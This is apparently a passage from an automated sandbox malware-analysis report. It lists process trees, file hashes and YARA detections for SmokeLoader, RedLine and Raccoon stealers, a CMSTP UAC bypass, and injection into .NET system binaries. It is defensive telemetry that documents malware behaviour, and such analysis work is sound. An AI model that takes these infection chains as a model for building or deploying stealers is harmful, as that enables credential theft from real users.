                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000000.326584645.0000000004DE1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:high

                                                                                                                                                Analysis Process: gbhudtb PID: 7044 Parent PID: 664

                                                                                                                                                General

                                                                                                                                                Start time:14:09:40
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\gbhudtb
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\gbhudtb
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:346624 bytes
                                                                                                                                                MD5 hash:A0BC297D8EAAD37F1B145D108786E993
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:low

                                                                                                                                                Analysis Process: 21.exe PID: 2132 Parent PID: 3352

                                                                                                                                                General

                                                                                                                                                Start time:14:09:42
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:346624 bytes
                                                                                                                                                MD5 hash:A0BC297D8EAAD37F1B145D108786E993
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:low

                                                                                                                                                Analysis Process: 21.exe PID: 808 Parent PID: 2132

                                                                                                                                                General

                                                                                                                                                Start time:14:09:49
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:346624 bytes
                                                                                                                                                MD5 hash:A0BC297D8EAAD37F1B145D108786E993
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000013.00000002.400930179.0000000002061000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000013.00000002.400697119.0000000000580000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low

                                                                                                                                                Analysis Process: gbhudtb PID: 3016 Parent PID: 7044

                                                                                                                                                General

                                                                                                                                                Start time:14:09:51
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\gbhudtb
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\gbhudtb
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:346624 bytes
                                                                                                                                                MD5 hash:A0BC297D8EAAD37F1B145D108786E993
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:low

                                                                                                                                                Analysis Process: gbhudtb PID: 5332 Parent PID: 664

                                                                                                                                                General

                                                                                                                                                Start time:14:10:01
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\gbhudtb
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\gbhudtb
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:346624 bytes
                                                                                                                                                MD5 hash:A0BC297D8EAAD37F1B145D108786E993
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:low

                                                                                                                                                Analysis Process: B096.exe PID: 6404 Parent PID: 3352

                                                                                                                                                General

                                                                                                                                                Start time:14:10:02
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\B096.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\B096.exe
                                                                                                                                                Imagebase:0xa00000
                                                                                                                                                File size:512512 bytes
                                                                                                                                                MD5 hash:F57B28AEC65D4691202B9524F84CC54A
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000018.00000002.503371064.0000000003E09000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.520563950.0000000006381000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.519980779.0000000005F90000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\B096.exe, Author: Florian Roth
                                                                                                                                                Reputation:low

                                                                                                                                                Analysis Process: BBE1.exe PID: 4756 Parent PID: 3352

                                                                                                                                                General

                                                                                                                                                Start time:14:10:06
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\BBE1.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\BBE1.exe
                                                                                                                                                Imagebase:0x790000
                                                                                                                                                File size:22528 bytes
                                                                                                                                                MD5 hash:787AF677D0C317E8062B9705CB64F951
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\BBE1.exe, Author: Florian Roth
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 22%, ReversingLabs
                                                                                                                                                Reputation:moderate

                                                                                                                                                Analysis Process: gbhudtb PID: 3796 Parent PID: 5332

                                                                                                                                                General

                                                                                                                                                Start time:14:10:08
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\gbhudtb
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\gbhudtb
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:346624 bytes
                                                                                                                                                MD5 hash:A0BC297D8EAAD37F1B145D108786E993
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001C.00000002.449845582.0000000000561000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001C.00000002.449446646.0000000000530000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low

                                                                                                                                                Analysis Process: CBF0.exe PID: 6000 Parent PID: 3352

                                                                                                                                                General

                                                                                                                                                Start time:14:10:09
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\CBF0.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\CBF0.exe
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:212992 bytes
                                                                                                                                                MD5 hash:73252ACB344040DDC5D9CE78A5D3A4C2
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001D.00000003.438106147.0000000003080000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001D.00000002.453324146.00000000031C1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001D.00000002.453199313.0000000003090000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 80%, ReversingLabs
                                                                                                                                                Reputation:moderate

                                                                                                                                                Analysis Process: aspnet_state.exe PID: 4772 Parent PID: 6404

                                                                                                                                                General

                                                                                                                                                Start time:14:10:10
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe
                                                                                                                                                Imagebase:0x960000
                                                                                                                                                File size:47208 bytes
                                                                                                                                                MD5 hash:3269806DC450E24113CF4FE03C3AD197
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001E.00000000.439226875.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001E.00000000.438304869.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001E.00000000.439894383.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001E.00000000.440496476.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001E.00000002.466743057.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                Reputation:moderate

                                                                                                                                                Analysis Process: DF3A.exe PID: 5464 Parent PID: 3352

                                                                                                                                                General

                                                                                                                                                Start time:14:10:14
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\DF3A.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\DF3A.exe
                                                                                                                                                Imagebase:0xa40000
                                                                                                                                                File size:161280 bytes
                                                                                                                                                MD5 hash:9FA070AF1ED2E1F07ED8C9F6EB2BDD29
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                Reputation:moderate

                                                                                                                                                Analysis Process: EBBE.exe PID: 1140 Parent PID: 3352

                                                                                                                                                General

                                                                                                                                                Start time:14:10:17
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\EBBE.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\EBBE.exe
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:348672 bytes
                                                                                                                                                MD5 hash:539C39A9565CD4B120E5EB121E45C3C2
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000021.00000002.481901309.00000000048F1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000021.00000002.480747015.0000000002D30000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low

                                                                                                                                                Analysis Process: chrome.exe PID: 6016 Parent PID: 4772

                                                                                                                                                General

                                                                                                                                                Start time:14:10:20
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
                                                                                                                                                Imagebase:0x7ff68b0a0000
                                                                                                                                                File size:2150896 bytes
                                                                                                                                                MD5 hash:C139654B5C1438A95B321BB01AD63EF6
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Analysis Process: C066.exe PID: 5604 Parent PID: 3352

                                                                                                                                                General

                                                                                                                                                Start time:14:10:23
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\C066.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\C066.exe
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:601600 bytes
                                                                                                                                                MD5 hash:F0BE69176E592FA1A6345A7090A9EA30
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000023.00000003.479598454.0000000004960000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                                Analysis Process: chrome.exe PID: 6128 Parent PID: 6016

                                                                                                                                                General

                                                                                                                                                Start time:14:10:24
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1592,3532224147046022434,3796046305070752020,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1756 /prefetch:8
                                                                                                                                                Imagebase:0x7ff68b0a0000
                                                                                                                                                File size:2150896 bytes
                                                                                                                                                MD5 hash:C139654B5C1438A95B321BB01AD63EF6
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Analysis Process: chrome.exe PID: 1472 Parent PID: 4772

                                                                                                                                                General

                                                                                                                                                Start time:14:10:25
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
                                                                                                                                                Imagebase:0x7ff68b0a0000
                                                                                                                                                File size:2150896 bytes
                                                                                                                                                MD5 hash:C139654B5C1438A95B321BB01AD63EF6
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Analysis Process: chrome.exe PID: 3732 Parent PID: 1472

                                                                                                                                                General

                                                                                                                                                Start time:14:10:28
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1512,11815571981665026670,16401458370521835106,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1896 /prefetch:8
                                                                                                                                                Imagebase:0x7ff68b0a0000
                                                                                                                                                File size:2150896 bytes
                                                                                                                                                MD5 hash:C139654B5C1438A95B321BB01AD63EF6
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Analysis Process: DF3A.exe PID: 6180 Parent PID: 5464

                                                                                                                                                General

                                                                                                                                                Start time:14:10:28
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\DF3A.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\DF3A.exe
                                                                                                                                                Imagebase:0xed0000
                                                                                                                                                File size:161280 bytes
                                                                                                                                                MD5 hash:9FA070AF1ED2E1F07ED8C9F6EB2BDD29
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000027.00000000.489693993.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000027.00000000.488918061.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000027.00000000.488076798.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000027.00000000.487377447.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                Analysis Process: ServiceModelReg.exe PID: 7320 Parent PID: 6404

                                                                                                                                                General

                                                                                                                                                Start time:14:10:31
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe
                                                                                                                                                Imagebase:0xae0000
                                                                                                                                                File size:221800 bytes
                                                                                                                                                MD5 hash:FFF587A66B8D5A50A055B9CD6D632BEB
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000000.483819247.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000002.507631653.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000000.480873861.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000000.483001107.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000000.484896100.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                Analysis Process: chrome.exe PID: 8084 Parent PID: 7320

                                                                                                                                                General

                                                                                                                                                Start time:14:10:42
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
                                                                                                                                                Imagebase:0x7ff68b0a0000
                                                                                                                                                File size:2150896 bytes
                                                                                                                                                MD5 hash:C139654B5C1438A95B321BB01AD63EF6
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Analysis Process: chrome.exe PID: 5744 Parent PID: 7320

                                                                                                                                                General

                                                                                                                                                Start time:14:10:46
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
                                                                                                                                                Imagebase:0x7ff68b0a0000
                                                                                                                                                File size:2150896 bytes
                                                                                                                                                MD5 hash:C139654B5C1438A95B321BB01AD63EF6
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Analysis Process: chrome.exe PID: 6240 Parent PID: 8084

                                                                                                                                                General

                                                                                                                                                Start time:14:10:46
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,13203243795606022941,14762146736583605753,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1928 /prefetch:8
                                                                                                                                                Imagebase:0x7ff6225d0000
                                                                                                                                                File size:2150896 bytes
                                                                                                                                                MD5 hash:C139654B5C1438A95B321BB01AD63EF6
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Analysis Process: chrome.exe PID: 7992 Parent PID: 5744

                                                                                                                                                General

                                                                                                                                                Start time:14:10:50
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,11199746608983669523,6532242252009539287,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1944 /prefetch:8
                                                                                                                                                Imagebase:0x7ff68b0a0000
                                                                                                                                                File size:2150896 bytes
                                                                                                                                                MD5 hash:C139654B5C1438A95B321BB01AD63EF6
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Analysis Process: bhhudtb PID: 8080 Parent PID: 664

                                                                                                                                                General

                                                                                                                                                Start time:14:10:57
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\bhhudtb
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\bhhudtb
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:212992 bytes
                                                                                                                                                MD5 hash:73252ACB344040DDC5D9CE78A5D3A4C2
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Disassembly

                                                                                                                                                Code Analysis

                                                                                                                                                Reset < >